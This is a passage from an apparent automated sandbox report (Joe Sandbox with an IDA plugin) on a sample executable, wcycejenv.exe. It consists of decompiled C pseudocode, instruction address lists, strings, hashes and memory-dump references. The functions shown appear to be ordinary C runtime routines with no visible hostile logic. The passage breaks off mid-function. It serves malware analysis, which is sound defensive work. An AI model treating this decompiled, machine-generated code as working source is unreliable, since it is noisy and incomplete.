										__eflags = _t191;
										if(_t191 == 0) {
											L21:
											_t147 = 0;
										} else {
											_t191 =  *((intOrPtr*)(_t146 + 2));
											__eflags = _t191 - _t160[0];
											if(_t191 != _t160[0]) {
												break;
											} else {
												_t146 = _t146 + 4;
												_t160 =  &(_t160[1]);
												__eflags = _t191;
												if(_t191 != 0) {
													continue;
												} else {
													goto L21;
												}
											}
										}
										L23:
										__eflags = _t147;
										if(_t147 == 0) {
											goto L65;
										} else {
											goto L24;
										}
										goto L84;
									}
									asm("sbb eax, eax");
									_t147 = _t146 | 0x00000001;
									__eflags = _t147;
									goto L23;
								}
								goto L84;
							}
							asm("sbb eax, eax");
							_t145 = _t144 | 0x00000001;
							__eflags = _t145;
							goto L15;
						}
					} else {
						_t148 = E004308DA(_t149, _a12, 0x44aa18);
						if(_t148 != 0) {
							L71:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E0042C03B();
							asm("int3");
							_push(8);
							_push(0x4512c0);
							_t109 = E00408200(_t149, _t192, _t195);
							_t196 = _a4;
							__eflags = _t196;
							if(_t196 != 0) {
								_t110 = E00433897(5);
								_v8 = _v8 & 0x00000000;
								__eflags =  *(_t196 + 4);
								if( *(_t196 + 4) != 0) {
									__eflags = _t110 | 0xffffffff;
									asm("lock xadd [ecx], eax");
									if((_t110 | 0xffffffff) == 0) {
										__eflags =  *(_t196 + 4) - 0x454460;
										if( *(_t196 + 4) != 0x454460) {
											E0042E2C2( *(_t196 + 4));
										}
									}
								}
								_v8 = 0xfffffffe;
								E00429E5A();
								__eflags =  *_t196;
								if( *_t196 != 0) {
									E00433897(4);
									_v8 = 1;
									E004358DD( *_t196);
									_t114 =  *_t196;
									__eflags = _t114;
									if(_t114 != 0) {
										__eflags =  *(_t114 + 0xc);
										if( *(_t114 + 0xc) == 0) {
											__eflags = _t114 - 0x4542b0;
											if(_t114 != 0x4542b0) {
												E00435712(_t114);
											}
										}
									}
									_v8 = 0xfffffffe;
									E00429E66();
								}
								_t109 = E0042E2C2(_t196);
							}
							 *[fs:0x0] = _v20;
							return _t109;
						} else {
							 *_v488 = _t148;
							L69:
							_t86 = _t149;
							goto L70;
						}
					}
				}
				L84:
			}

0x004299e7
0x004299f2
0x004299f9
0x00429a00
0x00429a04
0x00429a07
0x00429a0d
0x00429a0f
0x00429a16
0x00429a1b
0x00429d91
0x00429d9f
0x00429a21
0x00429a25
0x00429a2b
0x00429a5e
0x00429a65
0x00429a68
0x00429a6e
0x00429a6e
0x00429a74
0x00429a77
0x00429a7d
0x00429a8a
0x00429a8f
0x00429a91
0x00429a91
0x00429a93
0x00429a96
0x00429a96
0x00429a99
0x00429a9c
0x00429a9c
0x00429aa3
0x00429aa5
0x00429aab
0x00429ab1
0x00429b25
0x00429b25
0x00429b2c
0x00429b36
0x00429b39
0x00429b3f
0x00429b40
0x00429b42
0x00429bbd
0x00000000
0x00429b44
0x00429b44
0x00429b4a
0x00429b4c
0x00429b52
0x00429b53
0x00429b54
0x00429b55
0x00429b5e
0x00429b57
0x00429b57
0x00429b57
0x00429b63
0x00429b66
0x00429b68
0x00429bc3
0x00429bc4
0x00429bc9
0x00429bca
0x00429bcc
0x00429c04
0x00429c05
0x00429c0b
0x00429c0c
0x00429c0e
0x00429d80
0x00429d80
0x00429d82
0x00000000
0x00429c14
0x00429c1b
0x00429c20
0x00429c22
0x00000000
0x00429c28
0x00429c28
0x00429c2f
0x00429c32
0x00429cc6
0x00000000
0x00429c38
0x00429c38
0x00429c3e
0x00429c41
0x00429c43
0x00429c43
0x00429c43
0x00429c48
0x00429c49
0x00429c4c
0x00429c8f
0x00429c8f
0x00429c97
0x00000000
0x00429c9d
0x00429c9d
0x00429ca4
0x00000000
0x00429caa
0x00429caa
0x00429cb2
0x00000000
0x00000000
0x00000000
0x00000000
0x00429cb2
0x00429ca4
0x00429c4e
0x00429c4e
0x00429c58
0x00429c5b
0x00429c5d
0x00429c5d
0x00429c5d
0x00429c60
0x00429c63
0x00000000
0x00429c65
0x00429c65
0x00429c6f
0x00429c72
0x00429c74
0x00429c74
0x00429c74
0x00429c77
0x00429c7a
0x00000000
0x00429c7c
0x00429c7c
0x00429c83
0x00000000
0x00429c85
0x00429c85
0x00429c8d
0x00429cb8
0x00429cb8
0x00429ccc
0x00429ccc
0x00429cd0
0x00429cd2
0x00429cd4
0x00429ce0
0x00429ce5
0x00429ce8
0x00429cea
0x00000000
0x00429cf0
0x00429cf0
0x00429cf6
0x00429cf9
0x00429cf9
0x00429cfc
0x00429cff
0x00429cff
0x00429d08
0x00429d08
0x00429d0f
0x00429d16
0x00000000
0x00429d16
0x00000000
0x00000000
0x00000000
0x00429c8d
0x00429c83
0x00429c7a
0x00429c63
0x00429c4c
0x00429c32
0x00429c22
0x00429bce
0x00429bce
0x00429bd3
0x00429bd7
0x00429bd9
0x00429bdb
0x00429be7
0x00429bec
0x00429bef
0x00429bf1
0x00000000
0x00429bf7
0x00429bf7
0x00429bf8
0x00429d17
0x00429d1d
0x00000000
0x00429d1d
0x00429bf1
0x00429b6a
0x00429b6a
0x00429b76
0x00429b7d
0x00429b82
0x00429b88
0x00429b8b
0x00429b8e
0x00429b8e
0x00429b91
0x00429b94
0x00429b94
0x00429bb2
0x00429bb7
0x00429d22
0x00429d24
0x00429d27
0x00429d4d
0x00429d53
0x00429d55
0x00000000
0x00429d29
0x00429d2e
0x00429d34
0x00000000
0x00429d36
0x00429d36
0x00429d3f
0x00429d44
0x00429d47
0x00429d49
0x00000000
0x00429d4b
0x00000000
0x00429d4b
0x00429d49
0x00429d34
0x00429d27
0x00429b68
0x00429ab3
0x00429ab3
0x00429ab5
0x00429ab7
0x00429ab7
0x00429aba
0x00429abd
0x00000000
0x00000000
0x00429abf
0x00429ac2
0x00429ad9
0x00429ad9
0x00429ac4
0x00429ac4
0x00429ac8
0x00429acc
0x00000000
0x00429ace
0x00429ace
0x00429ad1
0x00429ad4
0x00429ad7
0x00000000
0x00000000
0x00000000
0x00000000
0x00429ad7
0x00429acc
0x00429ae2
0x00429ae2
0x00429ae4
0x00429d58
0x00429d70
0x00429d72
0x00429d7a
0x00429d7c
0x00000000
0x00429d7e
0x00429d84
0x00429d8a
0x00000000
0x00429d8a
0x00429aea
0x00429aea
0x00429af0
0x00429af2
0x00429af2
0x00429af5
0x00429af8
0x00000000
0x00000000
0x00429afa
0x00429afd
0x00429b14
0x00429b14
0x00429aff
0x00429aff
0x00429b03
0x00429b07
0x00000000
0x00429b09
0x00429b09
0x00429b0c
0x00429b0f
0x00429b12
0x00000000
0x00000000
0x00000000
0x00000000
0x00429b12
0x00429b07
0x00429b1d
0x00429b1d
0x00429b1f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00429b1f
0x00429b18
0x00429b1a
0x00429b1a
0x00000000
0x00429b1a
0x00000000
0x00429ae4
0x00429add
0x00429adf
0x00429adf
0x00000000
0x00429adf
0x00429a33
0x00429a3c
0x00429a46
0x00429da0
0x00429da2
0x00429da3
0x00429da4
0x00429da5
0x00429da6
0x00429da7
0x00429dac
0x00429dad
0x00429daf
0x00429db4
0x00429db9
0x00429dbc
0x00429dbe
0x00429dc6
0x00429dcc
0x00429dd3
0x00429dd5
0x00429dd7
0x00429dda
0x00429dde
0x00429de0
0x00429de7
0x00429dec
0x00429df1
0x00429de7
0x00429dde
0x00429df2
0x00429df9
0x00429dfe
0x00429e01
0x00429e05
0x00429e0b
0x00429e14
0x00429e1a
0x00429e1c
0x00429e1e
0x00429e20
0x00429e24
0x00429e26
0x00429e2b
0x00429e2e
0x00429e33
0x00429e2b
0x00429e24
0x00429e34
0x00429e3b
0x00429e3b
0x00429e41
0x00429e46
0x00429e4a
0x00429e56
0x00429a4c
0x00429a52
0x00429d8f
0x00429d8f
0x00000000
0x00429d8f
0x00429a46
0x00429a2b
0x00000000

APIs

_free.LIBCMT ref: 00429DEC
_free.LIBCMT ref: 00429E41

Strings

`DE, xrefs: 00429DE0
-, xrefs: 00429C8F

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: _free
String ID: -$`DE
API String ID: 269201875-173527295
Opcode ID: 7edeb44da998f66c12a5ec99e88d89bda251c3a9998994f3597f2f7bc902071a
Instruction ID: 020fc790a97abf7f6088bebf4d0ce861e4079fce8f50acf45140a4940b8df04c
Opcode Fuzzy Hash: 7edeb44da998f66c12a5ec99e88d89bda251c3a9998994f3597f2f7bc902071a
Instruction Fuzzy Hash: 9BC1F631B002259ADB24AF65EC41BFB73B4FF54314F9440AFE805A7281EB799E81CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00427858 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00427858(void* __edx, intOrPtr _a4) {
				signed int _v8;
				struct HINSTANCE__* _v12;
				char _v16;
				WCHAR* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t25;
				WCHAR** _t35;
				WCHAR** _t36;
				WCHAR* _t39;
				WCHAR* _t41;
				WCHAR* _t42;
				intOrPtr* _t43;
				WCHAR** _t44;
				intOrPtr _t47;
				WCHAR* _t48;
				WCHAR* _t53;
				void* _t56;
				WCHAR** _t57;
				WCHAR* _t63;
				WCHAR* _t65;

				_t56 = __edx;
				_t47 = _a4;
				if(_t47 != 0) {
					__eflags = _t47 - 2;
					if(_t47 == 2) {
						L5:
						GetModuleFileNameW(0, 0x4567a8, 0x104);
						_t25 =  *0x4569e8; // 0x6a1c92
						 *0x4569d4 = 0x4567a8;
						_v20 = _t25;
						__eflags = _t25;
						if(_t25 == 0) {
							L7:
							_t25 = 0x4567a8;
							_v20 = 0x4567a8;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t63 = E00427E52(E00427B34(_t25, 0, 0,  &_v8,  &_v16), _v8, _v16, 2);
							__eflags = _t63;
							if(__eflags != 0) {
								E00427B34(_v20, _t63, _t63 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t47 - 1;
								if(_t47 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t48 = E00431E02(_t47, _t56, 0, _t63, _t63);
									__eflags = _t48;
									if(_t48 == 0) {
										_t57 = _v12;
										_t53 = 0;
										_t35 = _t57;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											L17:
											_t36 = 0;
											 *0x4569d8 = _t53;
											_v12 = 0;
											_t48 = 0;
											 *0x4569e0 = _t57;
											L18:
											E0042E2C2(_t36);
											_v12 = 0;
											L19:
											E0042E2C2(_t63);
											_t39 = _t48;
											L20:
											return _t39;
										} else {
											goto L16;
										}
										do {
											L16:
											_t35 =  &(_t35[1]);
											_t53 =  &(_t53[0]);
											__eflags =  *_t35;
										} while ( *_t35 != 0);
										goto L17;
									}
									_t36 = _v12;
									goto L18;
								}
								_t41 = _v8 - 1;
								__eflags = _t41;
								 *0x4569d8 = _t41;
								_t42 = _t63;
								_t63 = 0;
								 *0x4569e0 = _t42;
								L12:
								_t48 = 0;
								goto L19;
							}
							_t43 = E0042C135(__eflags);
							_push(0xc);
							_pop(0);
							 *_t43 = 0;
							goto L12;
						}
						__eflags =  *_t25;
						if( *_t25 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t47 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t44 = E0042C135(__eflags);
					_t65 = 0x16;
					 *_t44 = _t65;
					E0042C00E();
					_t39 = _t65;
					goto L20;
				}
				return 0;
			}

0x00427858
0x00427861
0x00427866
0x00427870
0x00427873
0x00427890
0x0042789f
0x004278a5
0x004278aa
0x004278b0
0x004278b3
0x004278b5
0x004278bc
0x004278bc
0x004278be
0x004278c1
0x004278c4
0x004278cb
0x004278e4
0x004278e9
0x004278eb
0x0042790c
0x00427914
0x00427917
0x00427932
0x00427935
0x0042793c
0x00427940
0x00427942
0x00427949
0x0042794c
0x0042794e
0x00427950
0x00427952
0x0042795c
0x0042795c
0x0042795e
0x00427964
0x00427967
0x00427969
0x0042796f
0x00427970
0x00427976
0x00427979
0x0042797a
0x00427980
0x00427983
0x00000000
0x00000000
0x00000000
0x00000000
0x00427954
0x00427954
0x00427954
0x00427957
0x00427958
0x00427958
0x00000000
0x00427954
0x00427944
0x00000000
0x00427944
0x0042791c
0x0042791c
0x0042791d
0x00427922
0x00427924
0x00427926
0x0042792b
0x0042792b
0x00000000
0x0042792b
0x004278ed
0x004278f2
0x004278f4
0x004278f5
0x00000000
0x004278f5
0x004278b7
0x004278ba
0x00000000
0x00000000
0x00000000
0x004278ba
0x00427875
0x00427878
0x00000000
0x00000000
0x0042787a
0x00427881
0x00427882
0x00427884
0x00427889
0x00000000
0x00427889
0x00000000

Strings

C:\Users\user\AppData\Local\Temp\wcycejenv.exe, xrefs: 00427896, 0042789D, 004278D1

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\wcycejenv.exe
API String ID: 0-988947707
Opcode ID: 782b9edca475d6e33436a2942afad8d5e1731d69252bb8650b32997f1126ac10
Instruction ID: cd4b2e282f4f7af87bfc83acef87e9af0f74f9529d324a9ccadcbe655f1ac0be
Opcode Fuzzy Hash: 782b9edca475d6e33436a2942afad8d5e1731d69252bb8650b32997f1126ac10
Instruction Fuzzy Hash: 443195B1B04325ABDB11EF9AEC859AFBBB8EF85714B91006BE504D7311D7748E80CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0043247A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0043247A(signed int __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8, char _a12, void* _a16) {
				void* _v5;
				char _v12;
				char _v16;
				char* _v20;
				char _v24;
				void* __ebp;
				char _t39;
				char _t48;
				char _t51;
				char _t58;
				signed int _t64;
				void* _t75;
				void* _t80;
				signed int _t85;

				_t78 = __edx;
				_t1 =  &_a16; // 0x456d28
				_push( *_t1);
				_push(_a12);
				E00432593(__ebx, __edx, __edi, __esi, __eflags);
				_t39 = E004321FD(__eflags, _a4);
				_v16 = _t39;
				if(_t39 !=  *((intOrPtr*)( *(_a12 + 0x48) + 4))) {
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					_t80 = E0042E2FC(0x220);
					_t64 = __ebx | 0xffffffff;
					__eflags = _t80;
					if(__eflags == 0) {
						L5:
						_t85 = _t64;
					} else {
						_t80 = memcpy(_t80,  *(_a12 + 0x48), 0x88 << 2);
						 *_t80 =  *_t80 & 0x00000000;
						_t85 = E004326F0(_t78, __eflags, _v16, _t80);
						__eflags = _t85 - _t64;
						if(__eflags != 0) {
							__eflags = _a8;
							if(_a8 == 0) {
								E004296E9();
							}
							asm("lock xadd [eax], ebx");
							_t66 = _t64 == 1;
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								_t58 = _a12;
								__eflags =  *((intOrPtr*)(_t58 + 0x48)) - 0x454460;
								if( *((intOrPtr*)(_t58 + 0x48)) != 0x454460) {
									E0042E2C2( *((intOrPtr*)(_t58 + 0x48)));
								}
							}
							 *_t80 = 1;
							_t75 = _t80;
							_t80 = 0;
							 *(_a12 + 0x48) = _t75;
							_t48 = _a12;
							__eflags =  *(_t48 + 0x350) & 0x00000002;
							if(( *(_t48 + 0x350) & 0x00000002) == 0) {
								__eflags =  *0x4549dc & 0x00000001;
								if(__eflags == 0) {
									_v24 =  &_a12;
									_v20 =  &_a16;
									_t51 = 5;
									_v16 = _t51;
									_v12 = _t51;
									_push( &_v16);
									_push( &_v24);
									_push( &_v12);
									E00432059(_t66, 0, _t85, __eflags);
									__eflags = _a8;
									if(_a8 != 0) {
										 *0x45436c =  *_a16;
									}
								}
							}
						} else {
							 *((intOrPtr*)(E0042C135(__eflags))) = 0x16;
							goto L5;
						}
					}
					E0042E2C2(_t80);
					return _t85;
				} else {
					return 0;
				}
			}

0x0043247a
0x00432482
0x00432482
0x00432485
0x00432488
0x00432490
0x0043249b
0x004324a4
0x004324aa
0x004324ab
0x004324ac
0x004324b7
0x004324b9
0x004324bd
0x004324bf
0x004324ef
0x004324ef
0x004324c1
0x004324ce
0x004324d4
0x004324dc
0x004324e0
0x004324e2
0x004324ff
0x00432503
0x00432505
0x00432505
0x00432510
0x00432514
0x00432514
0x00432515
0x00432517
0x0043251a
0x00432521
0x00432526
0x0043252b
0x00432521
0x0043252c
0x00432532
0x00432537
0x00432539
0x0043253c
0x0043253f
0x00432546
0x00432548
0x0043254f
0x00432554
0x0043255f
0x00432562
0x00432563
0x00432566
0x0043256c
0x00432570
0x00432574
0x00432575
0x0043257a
0x0043257e
0x00432589
0x00432589
0x0043257e
0x0043254f
0x004324e4
0x004324e9
0x00000000
0x004324e9
0x004324e2
0x004324f2
0x004324fe
0x004324a6
0x004324a9
0x004324a9

APIs

Part of subcall function 004321FD: GetOEMCP.KERNEL32(00000000,00432495,?,?,(mE`wB,00456D28,00427760), ref: 00432228

_free.LIBCMT ref: 004324F2

Strings

`DE, xrefs: 0043251A
(mE`wB, xrefs: 00432482

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: _free
String ID: (mE`wB$`DE
API String ID: 269201875-970405834
Opcode ID: d4def20fe51c2a8d59d9e21a48b5337a177d57b8859adb0ec89c16573b5ce918
Instruction ID: 578bb733190600fd7022003c9b8d9b855af29857c2c7f214ab62ce35fcecc44c
Opcode Fuzzy Hash: d4def20fe51c2a8d59d9e21a48b5337a177d57b8859adb0ec89c16573b5ce918
Instruction Fuzzy Hash: C631D271900259AFCB01DF69D941A9B77F4BF48328F11406AF9149B2A2EBB99D40CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00430093 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00430093(void* __ecx) {
				intOrPtr _t9;
				intOrPtr _t14;
				intOrPtr _t18;
				signed int _t21;
				signed int _t28;
				intOrPtr _t30;
				intOrPtr _t31;

				_t9 =  *0x456b00; // 0x200
				_t30 = 3;
				if(_t9 != 0) {
					__eflags = _t9 - _t30;
					if(_t9 < _t30) {
						_t9 = _t30;
						goto L4;
					}
				} else {
					_t9 = 0x200;
					L4:
					 *0x456b00 = _t9;
				}
				 *0x456b04 = E00430BC8(_t9, 4);
				E0042E2C2(0);
				if( *0x456b04 != 0) {
					L8:
					_t28 = 0;
					__eflags = 0;
					_t31 = 0x454380;
					do {
						_t1 = _t31 + 0x20; // 0x4543a0
						E0042CDDE(__eflags, _t1, 0xfa0, 0);
						_t14 =  *0x456b04; // 0x6c2f60
						 *((intOrPtr*)(_t14 + _t28 * 4)) = _t31;
						_t18 =  *((intOrPtr*)( *((intOrPtr*)(0x456b18 + (_t28 >> 6) * 4)) + 0x18 + (_t28 & 0x0000003f) * 0x38));
						__eflags = _t18 - 0xffffffff;
						if(_t18 == 0xffffffff) {
							L12:
							 *((intOrPtr*)(_t31 + 0x10)) = 0xfffffffe;
						} else {
							__eflags = _t18 - 0xfffffffe;
							if(_t18 == 0xfffffffe) {
								goto L12;
							} else {
								__eflags = _t18;
								if(_t18 == 0) {
									goto L12;
								}
							}
						}
						_t31 = _t31 + 0x38;
						_t28 = _t28 + 1;
						__eflags = _t31 - 0x454428;
					} while (__eflags != 0);
					__eflags = 0;
					return 0;
				} else {
					 *0x456b00 = _t30;
					 *0x456b04 = E00430BC8(_t30, 4);
					_t21 = E0042E2C2(0);
					if( *0x456b04 != 0) {
						goto L8;
					} else {
						return _t21 | 0xffffffff;
					}
				}
			}

0x00430093
0x0043009b
0x0043009e
0x004300a7
0x004300a9
0x004300ab
0x00000000
0x004300ab
0x004300a0
0x004300a0
0x004300ad
0x004300ad
0x004300ad
0x004300bc
0x004300c1
0x004300d0
0x004300fd
0x004300fe
0x004300fe
0x00430100
0x00430105
0x0043010c
0x00430110
0x00430115
0x0043011f
0x00430131
0x00430135
0x00430138
0x00430143
0x00430143
0x0043013a
0x0043013a
0x0043013d
0x00000000
0x0043013f
0x0043013f
0x00430141
0x00000000
0x00000000
0x00430141
0x0043013d
0x0043014a
0x0043014d
0x0043014e
0x0043014e
0x00430157
0x0043015a
0x004300d2
0x004300d5
0x004300e2
0x004300e7
0x004300f6
0x00000000
0x004300f8
0x004300fc
0x004300fc
0x004300f6

APIs

_free.LIBCMT ref: 004300C1
_free.LIBCMT ref: 004300E7

Strings

(DE, xrefs: 0043014E
`/l, xrefs: 004300BC, 004300C9, 004300E2, 004300EF, 00430115

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: _free
String ID: (DE$`/l
API String ID: 269201875-1417400721
Opcode ID: 89f7475d106ee6800a29277523ff94e2a305a845987b7a83518f04a3c585ea30
Instruction ID: 55bf8849136eaae9898525471808939cd475de06f8847ce836133b8e39bdc6a9
Opcode Fuzzy Hash: 89f7475d106ee6800a29277523ff94e2a305a845987b7a83518f04a3c585ea30
Instruction Fuzzy Hash: 1B11E671B0032097DB20DF29BC11B163AA8AB54735F56533BF524CB2E2E778EC42868D

Uniqueness

Uniqueness Score: -1.00%

Function 00409E9C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00409E9C(void* __ebx, void* __ecx, void* __edi, intOrPtr* _a4) {
				signed int* _v8;
				signed int _v12;
				signed int _v16;
				void* __esi;
				void* __ebp;
				void* _t19;
				void* _t21;
				signed int _t26;
				signed int _t35;
				void* _t38;
				intOrPtr* _t40;
				intOrPtr* _t42;
				intOrPtr _t43;
				signed int* _t44;

				_t34 = __ecx;
				_t33 = __ebx;
				_t42 = _a4;
				_push(__edi);
				_t40 =  *_t42;
				if( *_t40 == 0xe0434352 ||  *_t40 == 0xe0434f4d) {
					_t19 = E0040A321(_t33, _t34, _t38, _t40, _t42);
					__eflags =  *(_t19 + 0x18);
					if( *(_t19 + 0x18) > 0) {
						_t21 = E0040A321(_t33, _t34, _t38, _t40, _t42);
						_t3 = _t21 + 0x18;
						 *_t3 =  *(_t21 + 0x18) - 1;
						__eflags =  *_t3;
					}
				} else {
					if( *_t40 == 0xe06d7363) {
						 *((intOrPtr*)(E0040A321(__ebx, __ecx, _t38, _t40, _t42) + 0x10)) = _t40;
						_t43 =  *((intOrPtr*)(_t42 + 4));
						 *((intOrPtr*)(E0040A321(__ebx, __ecx, _t38, _t40, _t43) + 0x14)) = _t43;
						E0042B5DA(__ebx, __ecx, _t38, _t40, _t43, __eflags);
						asm("int3");
						_push(__ecx);
						_push(__ecx);
						_push(_t43);
						_t44 = _v8;
						 *_t44 =  *_t44 & 0x00000000;
						_t26 =  *(E0040A321(_t33, __ecx, _t38, _t40, _t44) + 0x10);
						__eflags = _t26;
						if(_t26 == 0) {
							L12:
							__eflags = 0;
							return 0;
						}
						_t35 =  *(_t26 + 0x1c);
						__eflags = _t35;
						if(_t35 == 0) {
							goto L12;
						}
						__eflags =  *_t35 & 0x00000010;
						if(( *_t35 & 0x00000010) == 0) {
							_t15 =  &_v12;
							 *_t15 = _v12 & 0x00000000;
							__eflags =  *_t15;
							_v16 = _t26;
							 *_t44 = E00409F5E(0x454b10,  &_v16);
							goto L12;
						}
						return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t26 + 0x18)))) - 4));
					} else {
					}
				}
				return 0;
			}

0x00409e9c
0x00409e9c
0x00409ea0
0x00409ea3
0x00409ea4
0x00409eac
0x00409ec0
0x00409ec5
0x00409ec9
0x00409ecb
0x00409ed0
0x00409ed0
0x00409ed0
0x00409ed0
0x00409eb6
0x00409ebc
0x00409ede
0x00409ee1
0x00409ee9
0x00409eec
0x00409ef1
0x00409ef5
0x00409ef6
0x00409ef7
0x00409ef8
0x00409efb
0x00409f03
0x00409f06
0x00409f08
0x00409f39
0x00409f39
0x00000000
0x00409f39
0x00409f0a
0x00409f0d
0x00409f0f
0x00000000
0x00000000
0x00409f11
0x00409f14
0x00409f20
0x00409f20
0x00409f20
0x00409f24
0x00409f37
0x00000000
0x00409f37
0x00000000
0x00000000
0x00409ebe
0x00409ebc
0x00409ed8

APIs

__is_exception_typeof.LIBVCRUNTIME ref: 00409F30

Strings

csm, xrefs: 00409EB6
MOC, xrefs: 00409EAE
RCC, xrefs: 00409EA6

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: __is_exception_typeof
String ID: MOC$RCC$csm
API String ID: 3140442014-2671469338
Opcode ID: 39ba09b58b12524e4c52f00aa173bbb6275a6684716526c2031698497dc6f86f
Instruction ID: 131a9e8604942e73e88f5281abe76733ec1676fa41fa2b5faf81d825217bc59a
Opcode Fuzzy Hash: 39ba09b58b12524e4c52f00aa173bbb6275a6684716526c2031698497dc6f86f
Instruction Fuzzy Hash: 30118131114205DFD718DF56D501A9AB7A4EF00319F1540BBE800AB2E2D7BCED40CBDA

Uniqueness

Uniqueness Score: -1.00%

Function 00442FEB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00442FEB(void* __eflags, signed int _a4) {
				intOrPtr _t13;
				void* _t21;
				signed int _t33;
				long _t35;

				_t33 = _a4;
				if(E00433FF0(_t33) != 0xffffffff) {
					_t13 =  *0x456b18; // 0x6c4a58
					if(_t33 != 1 || ( *(_t13 + 0x98) & 0x00000001) == 0) {
						if(_t33 != 2 || ( *(_t13 + 0x60) & 0x00000001) == 0) {
							goto L7;
						} else {
							goto L6;
						}
					} else {
						L6:
						_t21 = E00433FF0(2);
						if(E00433FF0(1) == _t21) {
							goto L1;
						}
						L7:
						if(CloseHandle(E00433FF0(_t33)) != 0) {
							goto L1;
						}
						_t35 = GetLastError();
						L9:
						E00433F5F(_t33);
						 *((char*)( *((intOrPtr*)(0x456b18 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x38)) = 0;
						if(_t35 == 0) {
							return 0;
						}
